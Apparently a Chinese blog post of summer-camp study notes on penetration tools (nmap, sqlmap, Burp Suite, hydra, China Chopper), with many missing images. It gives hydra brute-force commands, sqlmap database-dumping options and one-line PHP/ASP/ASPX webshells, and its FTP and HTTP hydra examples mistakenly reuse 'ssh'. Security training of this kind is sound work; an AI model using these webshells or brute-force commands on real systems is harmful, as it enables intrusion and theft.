夏令营集训1---渗透工具

在这里插入图片描述
1 nmap
在这里插入图片描述

主要功能:

(1)
主机发现
(2)
端口扫描
(3)
版本侦测
(4)
操作系统侦测

nmap的常用参数:

-A :选项用于使用进攻性方式扫描
-T4: 指定扫描过程使用的时序,总有6个级别(0-5),级别越高,扫描速度越 快,但也容易被防火墙或IDS检测并屏蔽掉,在网络通讯状况较好的情况下推荐使用T4
-oX test.xml: 将扫描结果生成 test.xml 文件
-oG test.txt: 将扫描结果生成 test.txt 文件
-sn : 只进行主机发现,不进行端口扫描
-O : 指定Nmap进行系统版本扫描
-sV: 指定让Nmap进行服务版本扫描
-p : 扫描指定的端口
-sS/sT/sA/sW/sM:指定使用 TCP SYN/Connect()/ACK/Window/Maimon scans的 方式来对目标主机进行扫描
-sU: 指定使用UDP扫描方式确定目标主机的UDP端口状况
-script

扫描单个主机大域名或IP地址:

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

2 sqlmap

在这里插入图片描述 sqlmap参数:

-p 指定测试参数
-b 获取banner
–dbs 列举数据库
–is-dba 是否是管理员权限
–current-db 当前数据库
–current-user 当前用户
–tables 列举数据库的表名

–count 检索所有条目数
–columns 获取表的列名
–dump 获取表中的数据,包含列
–dump-all 转存DBMS数据库所有表项目
–level 测试等级(1-5),默认为1
-v 显示详细信息

在这里插入图片描述

实例:查看指定数据库,表,列,内容等:

–dbs 列举数据库
在这里插入图片描述

–current-db 当前数据库

在这里插入图片描述在这里插入图片描述

–tables 列举数据库的表名
在这里插入图片描述

在这里插入图片描述

–columns 获取表的列名
在这里插入图片描述
在这里插入图片描述

–dump 获取表中的数据,包含列
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

3 burpsuite

在这里插入图片描述
proxy代理模块
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

今天我们当场爆破了一个四位数密码:

在这里插入图片描述

配置好代理,然后抓包具体看前面,抓到包就发送到intrude然后依次步骤:

Attack-type攻击类型为一处爆破点,因此payload set有效载荷为1,有效载荷类型为数字。然后从0000开始因为不知道密码是几位数,每次位一个步骤:

在这里插入图片描述

在这里插入图片描述

当扫完的时候你会发现密码的长度或是一些内容会和其他的又很明显的区别,所以一般情况就是那个:
在这里插入图片描述
4 hydra
在这里插入图片描述
hydra参数:
-R:继续从上一次进度接着破解
-S:大写,采用SSL链接
-s :小写,可通过这个参数指定非默认端口
-l :指定破解的用户,对特定用户破解
-L :指定用户名字典
-p :小写,指定密码破解,少用,一般是采用密码字典
-P :大写,指定密码字典
-e :可选,n:空密码试探,s:使用指定用户和密码试探
-C :使用冒号分割格式,例如“登录名:密码”来
代替 -L/-P 参数
-M :指定目标列表文件一行一条
-o :指定结果输出文件
-f :在使用-M参数以后,找到第一对登录名或者密码的时候中止破解
-t :同时运行的线程数,默认为16
-w

破解ssh

hydra -L user.txt -P passwd.txt -o ssh.txt -vV -t 5 target_IP ssh

-L指定用户字典 -P 指定密码字典 -o把成功的输出到ssh.txt文件 -vV显示详细信息

破解FTP:

hydra -L user.txt -P passwd.txt -o ftp.txt -vV -t 5 target_IP ssh
-L指定用户名列表
-P指定密码字典
-o把爆破的输出到文件
-t指定线程
-vV 显示详细信息

破解HTTP:

hydra -L user.txt -P passwd.txt -o ssh.txt -vV -t 5 target_IP ssh

-L指定用户字典

-P 指定密码字典    
    -o把成功的输出到ssh.txt文件   
          -vV显示详细信息

6 中国菜刀:
在这里插入图片描述

基本操作:

往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取

在这里插入图片描述
一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。
简单的一句话木马:
PHP:
<?php @eval($_POST['pass']);?>
Asp:
<%eval request (“pass”)%>
Aspx:
<%@ Page Language=“Jscript”%><%eval(Request.Item[“pass”],“unsafe”);%>

还不理解!

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值